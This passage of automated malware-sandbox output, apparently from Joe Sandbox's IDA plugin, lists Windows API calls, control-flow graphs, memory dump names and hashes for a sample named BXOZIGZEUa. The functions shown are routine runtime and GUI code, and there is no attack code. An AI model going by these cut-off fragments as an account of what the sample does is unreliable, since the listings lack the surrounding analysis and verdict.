                                                              • GetObjectW.GDI32(00000082,00000018,?), ref: 00547A81
                                                              • SelectObject.GDI32(?,00000082), ref: 00547A95
                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00547AB9
                                                              • SelectObject.GDI32(?,00000000), ref: 00547ACC
                                                              • CreateCompatibleDC.GDI32(?), ref: 00547AE2
                                                              • SelectObject.GDI32(?,?), ref: 00547AF7
                                                              • SelectObject.GDI32(?,00000000), ref: 00547B06
                                                              • DeleteObject.GDI32(?), ref: 00547B0B
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00547B2B
                                                              • GetPixel.GDI32(?,?,?), ref: 00547B4A
                                                              • SetPixel.GDI32(?,?,?,00000000), ref: 00547B80
                                                              • SelectObject.GDI32(?,?), ref: 00547BA2
                                                              • SelectObject.GDI32(?,00000000), ref: 00547BAA
                                                              • DeleteObject.GDI32(00000082), ref: 00547BAF
                                                              • DeleteObject.GDI32(00000082), ref: 00547BE1
                                                              • __EH_prolog3.LIBCMT ref: 00547C15
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00547CE0
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00547CEC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Select$CompatibleCreate$Delete$H_prolog3Pixel$BitmapImageLoad
                                                              • String ID: $TR`
                                                              • API String ID: 1197801157-2251896978
                                                              • Opcode ID: 2f5f34bf517c139619c30be78d7b6b6189184353f727cb6781c5cd578d7af454
                                                              • Instruction ID: 7fd2ca687c9b506f4ee72ce71f8d356f76ea16cdd73b8c2623481439aae153f0
                                                              • Opcode Fuzzy Hash: 2f5f34bf517c139619c30be78d7b6b6189184353f727cb6781c5cd578d7af454
                                                              • Instruction Fuzzy Hash: FF025870D00229DFCF15DFA5C884AEEBFB6FF09704F10856AE805AA256DB748945DFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 784 4da0e9-4da12e call 4df877 GetModuleFileNameW 787 4da134 call 4dfc61 784->787 788 4da130-4da132 784->788 789 4da139-4da14e PathFindExtensionW 787->789 788->787 788->789 791 4da155-4da176 call 4da0a3 789->791 792 4da150 call 4dfc61 789->792 796 4da17d-4da181 791->796 797 4da178 call 4dfc61 791->797 792->791 799 4da19c-4da1a0 796->799 800 4da183-4da195 call 5cf65f 796->800 797->796 802 4da1d5-4da1d9 799->802 803 4da1a2-4da1b3 call 4dadc2 799->803 800->799 809 4da197 call 4dacc7 800->809 804 4da1db-4da1f3 call 4dadc2 802->804 805 4da214-4da21e 802->805 812 4da1b8-4da1ba 803->812 824 4da1f5-4da205 call 5cf65f 804->824 825 4da207 804->825 810 4da27e-4da282 805->810 811 4da220-4da238 805->811 809->799 815 4da284-4da2b0 call 5cf5ea call 4d87c0 call 5cf65f 810->815 816 4da2b6-4da2c4 call 5cc787 810->816 817 4da23a-4da23f 811->817 818 4da241 811->818 819 4da1bc-4da1c3 812->819 820 4da1c5 812->820 815->809 815->816 821 4da246-4da26d call 5ce545 call 4d87c0 call 5cf65f 817->821 818->821 822 4da1c8-4da1d3 call 5cf65f 819->822 820->822 821->809 844 4da273-4da27b 821->844 822->802 822->809 831 4da20e-4da212 824->831 825->831 831->805 831->809 844->810
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                                                              • String ID: .CHM$.HLP$.INI$X*b
                                                              • API String ID: 2477486372-2342915792
                                                              • Opcode ID: fd75f21c229430202632496f4598d6f2d2cfe988c0d5911fba89c33af4be3055
                                                              • Instruction ID: 942bf3c4ed0a129aa0bf6bd8aa65efabc2e2fbc4b48d735ccbb381f33d03e460
                                                              • Opcode Fuzzy Hash: fd75f21c229430202632496f4598d6f2d2cfe988c0d5911fba89c33af4be3055
                                                              • Instruction Fuzzy Hash: 485180709007099ECB20EB75CC59BAB77ECBF44704F0048AFA546D2351EB78D994CB6A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 845 4e1323-4e1344 EnterCriticalSection 846 4e1346-4e134d 845->846 847 4e1353-4e1358 845->847 846->847 848 4e1411-4e1414 846->848 849 4e135a-4e135d 847->849 850 4e1375-4e137d 847->850 852 4e141c-4e143a LeaveCriticalSection 848->852 853 4e1416-4e1419 848->853 851 4e1360-4e1363 849->851 854 4e137f-4e1392 call 4dafc0 GlobalAlloc 850->854 855 4e1394-4e13b8 GlobalHandle GlobalUnlock call 4dafc0 GlobalReAlloc 850->855 856 4e136d-4e136f 851->856 857 4e1365-4e136b 851->857 853->852 862 4e13be-4e13c0 854->862 855->862 856->848 856->850 857->851 857->856 863 4e13e5-4e140e GlobalLock call 5cf570 862->863 864 4e13c2-4e13c7 862->864 863->848 866 4e13c9-4e13d1 GlobalHandle GlobalLock 864->866 867 4e13d7-4e13e0 LeaveCriticalSection call 4dacc7 864->867 866->867 867->863
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(00643518,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1336
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C), ref: 004E138C
                                                              • GlobalHandle.KERNEL32(00C76BD8), ref: 004E1395
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004E139F
                                                              • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 004E13B8
                                                              • GlobalHandle.KERNEL32(00C76BD8), ref: 004E13CA
                                                              • GlobalLock.KERNEL32(00000000), ref: 004E13D1
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,006434FC,006434FC,?,004E1686,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E13DA
                                                              • GlobalLock.KERNEL32(00000000), ref: 004E13E6
                                                              • _memset.LIBCMT ref: 004E1400
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004E142E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                              • String ID:
                                                              • API String ID: 496899490-0
                                                              • Opcode ID: 72847f8a47570cbdb6c21f46cc393079c67067f6e06d411e7eb0dc623fddee7e
                                                              • Instruction ID: a0642e20be994aec857152caf3501acd8852c64be1fbc436cebdc09d050ba086
                                                              • Opcode Fuzzy Hash: 72847f8a47570cbdb6c21f46cc393079c67067f6e06d411e7eb0dc623fddee7e
                                                              • Instruction Fuzzy Hash: 9B31AF71640704AFDB209F66DC89A6EBBF9FF44705B05492EE942D36B0DB38E808CB54

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0055BD9F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
                                                                • Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
                                                                • Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F
                                                              • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0055BDF7
                                                              • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0055BE09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                              • String ID: s`$DragDelay$DragMinDist$windows
                                                              • API String ID: 3965097884-3886846763
                                                              • Opcode ID: 1dbe7102a4832671b5d9de12de529c9f50f243172d3b427ab81a02ba0934f2a5
                                                              • Instruction ID: 6d4cb5bbd95b8102afeb4acec472da06d6dd97a8bb4d8c30cba0d757bc6a0da0
                                                              • Opcode Fuzzy Hash: 1dbe7102a4832671b5d9de12de529c9f50f243172d3b427ab81a02ba0934f2a5
                                                              • Instruction Fuzzy Hash: 9B015AB49847409EE728AF67C846A0AFAE9BFA1700F40260FF1459B6A1C7F46401CF45

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *.*$4)b$oem$vector<T> too long
                                                              • API String ID: 0-954515597
                                                              • Opcode ID: 389ad698b8a0e067f61e316d01684a098e96ee30b06ba3c131904bdf1b697264
                                                              • Instruction ID: 4666f5621598f72e3f72d89d72da040041907fbd7406fb22d25d8609f9cc6897
                                                              • Opcode Fuzzy Hash: 389ad698b8a0e067f61e316d01684a098e96ee30b06ba3c131904bdf1b697264
                                                              • Instruction Fuzzy Hash: 8C91D330A00605ABCB04DFA9C865BAEB7B5FF55324F14825FE8119B3E1DB74AA04CB94

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 995 4df00f-4df04a GetModuleFileNameW 996 4df0f5-4df102 call 5cc787 995->996 997 4df050-4df055 995->997 998 4df064-4df0ac CreateActCtxWWorker 997->998 999 4df057-4df05f SetLastError 997->999 1001 4df0ae-4df0c1 CreateActCtxWWorker 998->1001 1002 4df0c7-4df0ce 998->1002 999->996 1001->1002 1002->996 1004 4df0d0-4df0ec CreateActCtxWWorker 1002->1004 1004->996 1005 4df0ee 1004->1005 1005->996
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 004DF042
                                                              • SetLastError.KERNEL32(0000006F,?,?), ref: 004DF059
                                                              • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 004DF0A1
                                                              • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 004DF0BF
                                                              • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 004DF0E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CreateWorker$ErrorFileLastModuleName
                                                              • String ID:
                                                              • API String ID: 3218422885-3916222277
                                                              • Opcode ID: 097efd26d1335cb0af2151ca0d09b0e5034d42aaba275eff19e6502befa0dcc1
                                                              • Instruction ID: d8ec78037e107f7ab7d65e459b886388d2f27f4511e930778e7196676148fc51
                                                              • Opcode Fuzzy Hash: 097efd26d1335cb0af2151ca0d09b0e5034d42aaba275eff19e6502befa0dcc1
                                                              • Instruction Fuzzy Hash: 90213A708002189EDB20DF65DC987EAB7F8BF54324F1046AFD06AE3290DB785A89DF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1006 5cf91b-5cf924 1007 5cf926-5cf930 call 5ce4b1 1006->1007 1008 5cf931-5cf937 1006->1008 1010 5cf939-5cf944 call 5ce216 1008->1010 1011 5cf946-5cf947 1008->1011 1019 5cf993-5cf995 1010->1019 1014 5cf979-5cf97c 1011->1014 1015 5cf97e-5cf98a call 5d8a17 call 5ce629 1014->1015 1016 5cf949-5cf94b 1014->1016 1033 5cf990 1015->1033 1020 5cf94d 1016->1020 1021 5cf94e-5cf964 RtlReAllocateHeap 1016->1021 1020->1021 1023 5cf9c4-5cf9c6 1021->1023 1024 5cf966-5cf96c 1021->1024 1026 5cf992 1023->1026 1027 5cf9ae-5cf9c2 call 5ce629 GetLastError call 5ce5e7 1024->1027 1028 5cf96e-5cf977 call 5d8a17 1024->1028 1026->1019 1027->1023 1028->1014 1035 5cf996-5cf9ac call 5ce629 GetLastError call 5ce5e7 1028->1035 1033->1026 1035->1033
                                                              APIs
                                                              • _malloc.LIBCMT ref: 005CF929
                                                                • Part of subcall function 005CE4B1: __FF_MSGBANNER.LIBCMT ref: 005CE4CA
                                                                • Part of subcall function 005CE4B1: __NMSG_WRITE.LIBCMT ref: 005CE4D1
                                                                • Part of subcall function 005CE4B1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE4F6
                                                              • _free.LIBCMT ref: 005CF93C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 401224a26dbb12a84de465807c0920c1ff155066d599c3f97c3fe6986e98f0a7
                                                              • Instruction ID: cbf0a2314c4c0358acf94fd10342d8150b0c60dbb6fbd86eeb5464ad229d61d6
                                                              • Opcode Fuzzy Hash: 401224a26dbb12a84de465807c0920c1ff155066d599c3f97c3fe6986e98f0a7
                                                              • Instruction Fuzzy Hash: 4C113036904616BFCF312BF4AC09F6D3E56BB953B0B21543EF85997190DE3499809790

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1042 4d1ff0-4d2094 call 4d8d50 * 4 SetupOpenInfFileW 1051 4d209a-4d20b2 1042->1051 1052 4d2145-4d2159 SetupFindFirstLineW 1042->1052 1055 4d20be-4d20d7 1051->1055 1056 4d20b4-4d20b9 1051->1056 1053 4d215f-4d2177 call 4d2a40 1052->1053 1054 4d2209-4d2229 SetupCloseInfFile 1052->1054 1053->1054 1071 4d217d-4d219b call 4d80e0 call 4d22c0 1053->1071 1057 4d222b-4d2230 1054->1057 1058 4d2235-4d224e 1054->1058 1060 4d20d9-4d20de 1055->1060 1061 4d20e3-4d20fc 1055->1061 1056->1055 1057->1058 1064 4d225a-4d2273 1058->1064 1065 4d2250-4d2255 1058->1065 1060->1061 1062 4d20fe-4d2103 1061->1062 1063 4d2108-4d2124 1061->1063 1062->1063 1067 4d2126-4d212b 1063->1067 1068 4d2130-4d2144 1063->1068 1069 4d227f-4d229b 1064->1069 1070 4d2275-4d227a 1064->1070 1065->1064 1067->1068 1072 4d229d-4d22a2 1069->1072 1073 4d22a7-4d22bd 1069->1073 1070->1069 1078 4d219d-4d21b3 call 4d2a40 1071->1078 1079 4d2201 1071->1079 1072->1073 1078->1054 1082 4d21b5-4d21ff call 4d2af0 call 4d5e30 call 4d8000 call 4d80e0 call 4d22c0 1078->1082 1079->1054 1082->1054 1082->1079
                                                              APIs
                                                              • SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 004D2089
                                                              • SetupFindFirstLineW.SETUPAPI(00000000,Manufacturer,00000000,?), ref: 004D2151
                                                              • SetupCloseInfFile.SETUPAPI(00000000), ref: 004D220A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Setup$File$CloseFindFirstLineOpen
                                                              • String ID: Manufacturer
                                                              • API String ID: 4028048665-624639268
                                                              • Opcode ID: ea87ab99fd255cf42b6a05c2ffe966258ba849457cf8e2a5de54929a4e7db0f1
                                                              • Instruction ID: 1d2ba3b01820508ee9eebf8ed6d9aa910ba6dbe384fcd2420cf8a7f5e13956e2
                                                              • Opcode Fuzzy Hash: ea87ab99fd255cf42b6a05c2ffe966258ba849457cf8e2a5de54929a4e7db0f1
                                                              • Instruction Fuzzy Hash: 569168702047019FD304CB2DC896A1AB7E5AFEA324F14875EF465873E1DB75E805CB96

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1093 5e86c3-5e86c9 1095 5e863c-5e863f 1093->1095 1096 5e863a 1093->1096 1097 5e8644-5e864a 1095->1097 1098 5e8641 1095->1098 1096->1095 1099 5e864c-5e864e 1097->1099 1098->1097 1100 5e865c-5e8664 1099->1100 1101 5e8650-5e865a 1099->1101 1102 5e866a-5e866c 1100->1102 1103 5e8666-5e8668 1100->1103 1101->1099 1101->1100 1105 5e866e-5e8671 1102->1105 1106 5e8690-5e8697 call 5e85fc 1102->1106 1104 5e86bf-5e86c2 1103->1104 1105->1106 1107 5e8673-5e8685 call 5e85fc 1105->1107 1110 5e869c-5e86a3 1106->1110 1107->1106 1115 5e8687 1107->1115 1110->1103 1112 5e86a5-5e86a7 1110->1112 1113 5e86bd 1112->1113 1114 5e86a9-5e86b8 call 5d39d7 1112->1114 1113->1104 1114->1113 1120 5e86ba-5e86bb 1114->1120 1117 5e8688-5e868e call 5ce05b 1115->1117 1117->1103 1120->1117
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Xfsopenstd::_$_fseek
                                                              • String ID: t!b
                                                              • API String ID: 1675860589-2207910921
                                                              • Opcode ID: 6295cb5da1a8d7cdf90af1bd1d60a4775eac88fb27e622108af80d6926d93e73
                                                              • Instruction ID: 8b325a6c1c05199629a5ac2a01b7ec1455b18988bb872233bd722ff868c053af
                                                              • Opcode Fuzzy Hash: 6295cb5da1a8d7cdf90af1bd1d60a4775eac88fb27e622108af80d6926d93e73
                                                              • Instruction Fuzzy Hash: 0911E372A01696ABDB3D0A579C06F7B3E8ABB60790F180034FECD95191EF61DD028689

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1122 4dd20c-4dd23b GetSystemDirectoryW 1123 4dd23d-4dd23f 1122->1123 1124 4dd241-4dd257 call 5cf15f 1122->1124 1126 4dd294-4dd2a1 call 5cc787 1123->1126 1129 4dd259-4dd270 call 5cf5ea 1124->1129 1130 4dd272-4dd285 call 5cf5ea 1124->1130 1129->1123 1129->1130 1130->1123 1136 4dd287-4dd28e call 4d94e4 1130->1136 1138 4dd293 1136->1138 1138->1126
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004DD233
                                                              • _wcslen.LIBCMT ref: 004DD248
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: DirectorySystem_wcslen
                                                              • String ID: \
                                                              • API String ID: 2940219301-2967466578
                                                              • Opcode ID: 3e1c307706e6b8ab0e7cb2607dcbe947eaf186c472e9bc0dc0a80fd905a67e1d
                                                              • Instruction ID: 5dd9e5017c69726cb11dff4508728f977c9a3b2d31606699d32eb1ff12851ee6
                                                              • Opcode Fuzzy Hash: 3e1c307706e6b8ab0e7cb2607dcbe947eaf186c472e9bc0dc0a80fd905a67e1d
                                                              • Instruction Fuzzy Hash: 4D019271D0011DAACF20DAB59C5DEEB7BBDBF55310F0408AFB808D3241E678DA88CA54
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00547C15
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00547CE0
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00547CEC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
